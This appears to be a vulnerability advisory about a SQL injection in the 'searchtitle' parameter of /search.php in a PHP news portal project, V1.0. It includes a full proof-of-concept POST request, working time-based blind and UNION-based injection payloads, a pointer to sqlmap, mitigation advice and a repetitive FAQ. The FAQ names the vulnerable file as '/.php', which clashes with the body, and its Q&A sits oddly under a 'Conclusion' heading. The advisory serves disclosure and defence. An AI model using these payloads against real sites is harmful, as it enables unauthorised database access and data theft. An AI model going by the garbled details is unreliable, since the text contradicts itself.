Projectworlds Best Online News Portal Project V1.0 /search.php SQL Injection

by ADMIN 77 views

Introduction

In this article, we will discuss a critical SQL injection vulnerability found in the 'Best online news portal project' in PHP, specifically in the '/search.php' file of version V1.0. This vulnerability allows attackers to inject malicious SQL code, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information.

Vulnerability Overview

The vulnerability stems from insufficient user input validation of the 'searchtitle' parameter, allowing attackers to inject malicious SQL queries. This issue can be exploited by attackers to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption.

Impact

The impact of this vulnerability is severe, as it allows attackers to:

  • Gain unauthorized access to databases
  • Modify or delete data
  • Access sensitive information
  • Perform comprehensive system control
  • Cause service interruption

Vulnerability Details

The vulnerability is located in the '/search.php' file of the 'Best online news portal System' project. The 'searchtitle' parameter is not properly validated, allowing attackers to inject malicious SQL code.

Proof of Concept (POC)

The following is a POC of the vulnerability:

POST /101news/101news/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://localhost
Connection: close
Referer: http://localhost/101news/101news/news-details.php?nid=5
Cookie: PHPSESSID=r3bt76ge3sjka91e1v4nogtgkm
Upgrade-Insecure-Requests: 1
Priority: u=0, i

searchtitle=111

Vulnerability Type

The vulnerability is a time-based blind SQL injection vulnerability, which allows attackers to inject malicious SQL code that takes a certain amount of time to execute.

Vulnerability Payload

The following is a payload that can be used to exploit the vulnerability:

---
Parameter: searchtitle (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=111' AND (SELECT 9902 FROM (SELECT(SLEEP(5)))MaAl) AND 'fKDn'='fKDn

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: searchtitle=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x576454474f687361594b564c76664e96848584e504373525072666c5746546a59714250777262,0x7171716b71)-- -
---

Exploitation

The vulnerability can be exploited using the following steps:

  1. Send a POST request to the '/search.php' file with the 'searchtitle' parameter set to a malicious SQL query.
  2. Use a tool such as sqlmap to automate the exploitation process.

Mitigation

To mitigate this vulnerability, the following steps can be taken:

  1. Validate user input to prevent SQL injection attacks.
  2. Use prepared statements to separate user input from SQL code.
  3. Use a web application firewall (WAF) to detect and prevent SQL injection attacks.

Conclusion

Q: What is the vulnerability in the 'Best online news portal project' in PHP?

A: The vulnerability is a SQL injection vulnerability in the '/search.php' file of version V1.0. It allows attackers to inject malicious SQL code, thereby gaining unauthorized access to databases, modifying or deleting data, and accessing sensitive information.

Q: What is the impact of this vulnerability?

A: The impact of this vulnerability is severe, as it allows attackers to:

  • Gain unauthorized access to databases
  • Modify or delete data
  • Access sensitive information
  • Perform comprehensive system control
  • Cause service interruption

Q: How can the vulnerability be exploited?

A: The vulnerability can be exploited by sending a POST request to the '/search.php' file with the 'searchtitle' parameter set to a malicious SQL query. A tool such as sqlmap can be used to automate the exploitation process.

Q: What is the payload used to exploit the vulnerability?

A: The payload used to exploit the vulnerability is a time-based blind SQL injection payload, which allows attackers to inject malicious SQL code that takes a certain amount of time to execute.

Q: How can the vulnerability be mitigated?

A: The vulnerability can be mitigated by:

  • Validating user input to prevent SQL injection attacks
  • Using prepared statements to separate user input from SQL code
  • Using a web application firewall (WAF) to detect and prevent SQL injection attacks

Q: Is the vulnerability specific to the 'Best online news portal project' in PHP?

A: No, the vulnerability is not specific to the 'Best online news portal project' in PHP. SQL injection vulnerabilities can occur in any web application that uses user input in SQL queries without proper validation and sanitization.

Q: Can the vulnerability be exploited without login or authorization?

A: Yes, the vulnerability can be exploited without login or authorization. The vulnerability is located in the '/search.php' file, which is publicly accessible.

Q: What is the version of the 'Best online news portal project' that is affected by the vulnerability?

A: The vulnerability affects version V1.0 of the 'Best online news portal project'.

Q: Where can I download the 'Best online news portal project' in PHP?

A: The 'Best online news portal project' in PHP can be downloaded from the Sourcecodester website.

Q: What is the software link for the 'Best online news portal project' in PHP?

A: The software link for the 'Best online news portal project' in PHP is https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip.

Q: Who is the submitter of the vulnerability report?

A: The submitter of the vulnerability report is liuyuanyuan.

Q: What is the vulnerable file that contains the vulnerability?

A: The vulnerable file that contains the vulnerability is '/.php'.

Q: What is the root cause of the vulnerability?

A: The root cause of the vulnerability is that the 'searchtitle' parameter is not properly validated, allowing attackers to inject malicious SQL code.